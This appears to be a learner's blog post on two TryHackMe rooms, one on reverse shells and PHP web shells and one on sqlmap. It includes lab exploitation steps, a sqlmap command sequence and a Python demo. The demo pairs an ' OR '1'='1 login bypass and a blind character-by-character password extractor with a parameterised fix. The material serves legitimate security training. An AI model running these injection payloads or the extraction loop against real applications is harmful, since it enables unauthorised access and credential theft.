
Training Update v0.48


Today we move on to the Shells Overview room on TryHackMe (THM), which, as the name suggests, is all about shells!

The module gives an overview of reverse and bind shells and how they function, as well as the various types of shell that can be deployed in different situations.

The room also covers various listeners such as the standard netcat, ncat, socat and others (there seems to be a running theme in the naming conventions for these listeners)!

The module covers various types of payload such as PHP, Python, Bash, Telnet, BusyBox and AWK (I have heard of AWK but never used it in this context).

The module also included some useful links to references –

p0wny-shell – A minimalistic single-file PHP web shell that allows remote command execution.

b374k shell – A more feature-rich PHP web shell with file management and command execution, among other functionalities.

c99 shell – A well-known and robust PHP web shell with extensive functionality.

The final task of this module was twofold. The first of the two flags that needed to be captured involved an unrestricted file upload vulnerability, which I exploited via a PHP webshell –


The uploaded PHP webshell allowed me to browse to the location it was uploaded to, /uploads/webshell.php, and then issue commands through the ‘cmd’ query parameter (?cmd=...) in the URL, and the flag was claimed.

The second reverse shell was gained in the following way –


For this one, I used a pipe reverse shell (which I didn’t think would work initially) entered straight into the hash file box on the web application. It worked, giving me a call-back to my netcat listener, which then gave me shell access to the box and access to the flag.

Overall, a good room with good examples and reinforcement of concepts!


Next we moved on to the SQLMap: The Basics room!

This room runs through the basics of the sqlmap tool, which is a great tool for checking web applications for SQL injection.

As the room progresses it shows how to use the tool to enumerate databases and tables, along with various other tips and tricks.

The final questions in the room ask the user to find the GET request made by the login form on the web page. It is found via the Network tab in the browser developer tools, as it is not displayed in the address bar the way a normal GET request is.

From there the request is – http://10.10.71.198/ai/includes/user_login?email=test&password=test

We feed this request to sqlmap and list the databases present using the --dbs flag, which shows there are six databases in use.

Then we find the table associated with the ‘ai’ database, and lastly the user is tasked with finding the password for the email ‘[email protected]?’, which turns out to be 12345678!
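As an added illustration (not part of the room, and not sqlmap's own code), the block below shows the kind of bug sqlmap finds in a login request like `user_login?email=...&password=...` and what it does behind `--dump`: a string-built query beside its parameterised fix, and a boolean-based blind extraction that rebuilds a password one character at a time from nothing but the application's true/false behaviour. The `user` table and its rows are constructed for the demo; the real schema of the room's ‘ai’ database is not given on the page.

```python
import sqlite3

# The sqlmap steps described in the post, for reference (the table name is not on the page):
#   sqlmap -u "http://10.10.71.198/ai/includes/user_login?email=test&password=test" --dbs
#   sqlmap -u "<same URL>" -D ai --tables
#   sqlmap -u "<same URL>" -D ai -T <table> --dump


def make_db():
    """Constructed in-memory stand-in for the room's database (sample rows, not real data)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE user (id INTEGER PRIMARY KEY, email TEXT, password TEXT)")
    db.executemany(
        "INSERT INTO user(email, password) VALUES (?, ?)",
        [("alice@example.com", "s3cret"), ("bob@example.com", "12345678")],
    )
    return db


def login_vulnerable(db, email, password):
    """String-concatenated query: the injectable pattern sqlmap detects on the login endpoint."""
    q = f"SELECT email FROM user WHERE email='{email}' AND password='{password}'"
    row = db.execute(q).fetchone()
    return row[0] if row else None


def login_fixed(db, email, password):
    """Same check with bound parameters: the quote in the payload is data, not SQL."""
    q = "SELECT email FROM user WHERE email=? AND password=?"
    row = db.execute(q, (email, password)).fetchone()
    return row[0] if row else None


def boolean_blind_extract(db, email, column="password", max_len=16):
    """Boolean-based blind extraction, the technique behind sqlmap --dump when the page only
    reveals 'login ok' vs 'login failed': for each position ask 'is character N equal to X?'
    by injecting into the email parameter and watching whether the login succeeds."""
    charset = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"
    recovered = ""
    for pos in range(1, max_len + 1):
        found = None
        for ch in charset:
            # Closes the email string, appends the oracle condition, and comments out the
            # trailing password check so only the injected condition decides the result.
            payload = f"{email}' AND substr({column},{pos},1)='{ch}'-- "
            if login_vulnerable(db, payload, "x") is not None:
                found = ch
                break
        if found is None:  # no character matched: we ran off the end of the value
            break
        recovered += found
    return recovered


if __name__ == "__main__":
    db = make_db()
    print("bypass:", login_vulnerable(db, "test", "test' OR '1'='1"))
    print("fixed: ", login_fixed(db, "test", "test' OR '1'='1"))
    print("blind: ", boolean_blind_extract(db, "bob@example.com"))
```

The classic `test' OR '1'='1` in the password field turns the WHERE clause into `password='test' OR '1'='1'`, which is always true, so the vulnerable login returns the first user; the parameterised version returns nothing for the same input. The blind loop makes one request per candidate character, which is why sqlmap's dumps take many requests and why that traffic is so visible in web server logs.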


A short room, but quite a good refresher on a tool I haven’t used in quite some time!


Until next time & don’t sleepwalk through life!


Bayi